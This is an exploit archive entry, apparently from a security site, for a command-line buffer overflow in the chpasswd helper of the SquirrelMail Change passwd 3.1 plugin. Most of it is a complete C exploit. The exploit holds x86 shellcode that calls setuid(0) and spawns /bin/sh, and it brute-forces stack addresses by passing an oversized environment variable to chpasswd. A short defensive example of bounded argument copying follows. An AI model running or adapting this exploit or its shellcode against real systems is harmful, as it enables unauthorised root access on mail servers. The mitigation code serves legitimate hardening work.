Change passwd 3.1 (SquirrelMail plugin)

2006.01.21
Credit: RoD hEDoR
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Change passwd 3.1 (SquirrelMail plugin)
Coded by rod hedor
web-- http://lezr.com
[local exploit]

Multiple buffer overflows are present in the handling of command line arguments in chpasswd.
The bug allows a hacker to exploit the process to run arbitrary code.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memcpy */

/* NOP padding followed by the payload */
const char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
                       "\x89\xe5\x31\xc0\x50\x55\x89\xe5"
                       "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
                       "\x2f\x62\x69\x89\xe3\x89\xe9\x89"
                       "\xea\xb0\x0b\xcd\x80";

/* Returns the current stack pointer; the value is left in %eax by the asm */
long get_sp(){
    __asm__("movl %esp,%eax;");
}

int main(){
    char buffer[1024];
    long stack = get_sp();
    int result = 1;
    long offset = 0;

    printf ("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n");
    printf ("[+] Current stack [0x%lx]\n",stack);

    /* Try successive stack addresses until chpasswd exits with status 0 */
    while(offset <= 268435456){
        offset = offset + 1;
        stack = get_sp() + offset;

        /* Environment variable: "EGG=" + filler + address + shellcode */
        memcpy(&buffer,"EGG=",4);
        int a = 4;
        while(a <= 108){
            memcpy(&buffer[a],"x",1);
            a = a + 1;
        }
        memcpy(&buffer[108],&stack,4);
        memcpy(&buffer[112],&shellcode,sizeof(shellcode));
        putenv(buffer);

        /* The oversized value reaches chpasswd as a command line argument */
        result = system("./chpasswd $EGG");
        if(result == 0){exit(0);}
    }
}
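For the defensive side of the command-line overflow described above, here is an added example (not from the advisory or from the plugin's source) of length-checked argument handling for a helper of this kind. The argument order (user, old password, new password), the field sizes and every name in it are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Assumed field sizes; not taken from chpasswd itself. */
#define USER_MAX 32
#define PASS_MAX 100

struct request {
    char user[USER_MAX + 1];
    char old_pass[PASS_MAX + 1];
    char new_pass[PASS_MAX + 1];
};

enum parse_status { PARSE_OK = 0, PARSE_USAGE = -1, PARSE_TOO_LONG = -2 };

/* Unsafe pattern this replaces: strcpy(req->user, argv[1]);
 * the copy length is chosen by the caller of the program,
 * not by the size of the destination buffer. */

/* Copy src into dst only if it fits, terminating NUL included. */
static int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    /* Look for the terminator within dst_size bytes only. */
    const char *end = memchr(src, '\0', dst_size);
    if (end == NULL)
        return PARSE_TOO_LONG;  /* reject: truncating would alter a credential */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return PARSE_OK;
}

/* Check the argument count and every argument length before storing. */
int parse_args(int argc, char *const argv[], struct request *req)
{
    int rc;

    if (argc != 4 || req == NULL)
        return PARSE_USAGE;
    memset(req, 0, sizeof *req);
    rc = copy_bounded(req->user, sizeof req->user, argv[1]);
    if (rc != PARSE_OK)
        return rc;
    rc = copy_bounded(req->old_pass, sizeof req->old_pass, argv[2]);
    if (rc != PARSE_OK)
        return rc;
    return copy_bounded(req->new_pass, sizeof req->new_pass, argv[3]);
}
```

Rejecting an oversized argument outright, rather than truncating it, keeps the stored credential identical to what was supplied and gives the caller a distinct error to log.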


Copyright 2024, cxsecurity.com

 
